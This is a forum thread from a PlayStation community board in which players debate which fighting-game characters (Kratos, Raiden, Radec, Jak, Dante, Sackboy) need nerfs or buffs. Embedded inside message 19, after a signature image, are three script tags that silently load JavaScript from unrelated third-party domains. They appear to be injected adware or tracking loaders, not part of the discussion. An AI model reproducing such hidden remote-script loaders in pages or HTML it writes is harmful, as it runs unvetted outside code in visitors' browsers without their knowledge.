Lombax Warrior
253 posts

Re: Kratos and Raiden needs a nerf. (And a little bit Radec)

Feb 5, 2013

Fun fact; Kratos' counter, neutral circle, will diflect progectiles, like radec's sniper or nate's barrel. Let's see Radec win once this gets out!

*World's most disappointed facepalm.*

%& Lead Scout for The Bunker! &%
Message 11 of 40 (212 Views)
0 Likes
First Son
6 posts

Feb 5, 2013

Well, people is saying that raiden is not THAT good, and I agree, but still he only needs ap for his level one, and he gains it fast, hes like, square, square square square+foward triangle circle+forward YOURE MINE HUEGEUHEUHEUHE, and the other 3 players are dead. 

Message 12 of 40 (203 Views)
0 Likes
Hekseville Citizen
282 posts

Feb 5, 2013

LOL thanks for the chuckles

Check out my channel for Combo Videos and Tournament matches!
www.youtube.com/mogilsumi
Message 13 of 40 (186 Views)
First Son
16 posts

Feb 5, 2013

Raiden sucks against Spike :smileyvery-happy:

Anyway, Kratos really needs to be nerfed, is really annoying how fast he gains AP. In the other hand we have Nariko, is a great character but if you don't develope a good technique with her you'll just end sucking hard, she isn't just mashing buttons. Kratos should be like Nariko in that way, It would be more interesting even to give him a try if you have to effort a little to put it's skills to work properly.

Sir Daniel needs to walk faster btw! haha XD

Message 14 of 40 (179 Views)
0 Likes
Sackboy
577 posts

Feb 5, 2013
Kratos needs a nerf, Raiden a little one, but NO WAY radec will get a nerf, he instead needs a BUFF

---------------------------------------------------------------------------------------------------

original.png

Message 15 of 40 (171 Views)
0 Likes
First Son
6 posts

[ Edited ]
Feb 5, 2013

Well, radec, yeah i think you people are right, i dont say he should be buffed, because his sniper spamming makes him gain ap. (good ap), but if you dont know how to dodge it, its very annoying

Message 16 of 40 (166 Views)
0 Likes
Gaming Beast
1746 posts

Feb 6, 2013
Wow I can't take any of you seriously if you think Raiden needs another nerf. He already got nerfed into oblivion and sucks **bleep** now. Don't think everyone is OP when you just suck. Raiden honestly needs a buff.
Message 17 of 40 (146 Views)
I Only Post Everything
876 posts

Feb 6, 2013

Fromundaman wrote:
He is most definitely not OP. Raiden really has no way to properly open you up anymore. The only reason people have an issue with him is that they don't pay attention to him/know how to deal with him in 4 player games, just like with Radec.

Raiden straight up loses to AT LEAST the following characters:

-Both Coles
-Ratchet
-Dan
-Big Daddy
-Jak

That's at least 6 bad matchups, and I hear Raiden players complain about Sweet Tooth as well.

As it stands now, Raiden has no effective way to stop you from just blocking and punishing his ending lag. He's high mid tier at absolute best.

Jaks only chance to win against Raiden is run away like a lil puss and lose the FFA or 2v2 because he got no supers. Any decent Raiden WILL make a fool of most characters no matter what the skill level.

Only dude I know who really destroys everyone he plays as Jak is BlueDiamond93 and thats because his reactions are rediculous, he makes my Jak look like a noob and I have been between 200 and 500 in the world for 3 seasons now and am currently at 336 this season. I have a long way to go before I can take BlueDiamond, but that doesn't mean I should take second in a FFA to Raiden, Drake, Sly, and Kratos almost everytime despite player skill level. Yes I do have the other guys in the match to blame more than myself for giving away another win, but clearly some characters should be buffed or these guys need a nerf so I don't have to drop jak for one of those 4 lame-os

"ZA ZA ZA ZA ZING"
Mains: Jak, Isaac Subs: Spike, Drake, Evil Cole
6 Seasons with Black Belt! (should be 8)
Message 18 of 40 (137 Views)
0 Likes
Gaming Beast
2167 posts

Feb 6, 2013
Okay, first off I say this in almost every thread I post, and I believe I did somewhere in this one as well but I'll restate it now just in case:
FFA as a game mode is not and will not ever be balanced. This is because it has less to do with character balance than it does having people distracted/ignore key people. Buffing/nerfing characters according to FFA destroys the balance in every game mode.

When I speak of balance, I speak of 1v1 and 2v2. 1v1 and 2v2, or basically if Raiden is actually fighting Jak rather than fighting 2 other people because he can't touch Jak and therefore has nothing to do with the matchup, he will lose. It basically comes down to this: Raiden can't really hit Jak, much less KC him.

Also you may want to look into Silver2_0-8. That Jak is ridiculous as well.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 19 of 40 (130 Views)
0 Likes
First Son
5 posts

Feb 6, 2013
Quite simply; Kratos, Raiden, Dante and Sackboy are all poorly balanced characters.
Kratos needs no words. I don't mind an OP character that much in general but as soon as someone combo'd me off a grab online that's when I hit my breaking point with that character.

As a Sweet Tooth main, it is fun to throw down mines and watch Raiden just get blown up. Unfortunately his dive kick options cancel that that and on block you cannot properly punish. His downward one doesn't seem to be grab punishable (online I'm talking here btw), his square slash combo doesn't seem to be that punishable (the window is so small it's retarded). His 1st special seems to pull you in if you're close and the range on it is ridiculous (it needs to be made smaller). Lastly, if a Raiden player knows how to grab, you are in serious trouble.

Dante. Well I played someone once and he was able to hit about 16+ hits effortlessly off of a low frame slash, I once tried to dash behind a Dante as he attacked and walk up to hit him and his Scythe swung behind him during his combo and hit me anyway. How can you justify that? He can't even be melee'd from behind while he's doing his stash combo.

Sackboy. Sackboy's "stuff" just fills too much screen and he's so small he's retardedly hard to hit. Oh and his level 3 can easily end 3 other characters with 3 stock each and win the game.

I've played a lot of 2v2 online. This game does have the same problem that Tekken Tag 2 has in that every character has something dirty about them, but in this game Kratos', Dante's, Raiden's and Sackboy's dirt far far far outweighs that of other characters.
Message 20 of 40 (124 Views)
0 Likes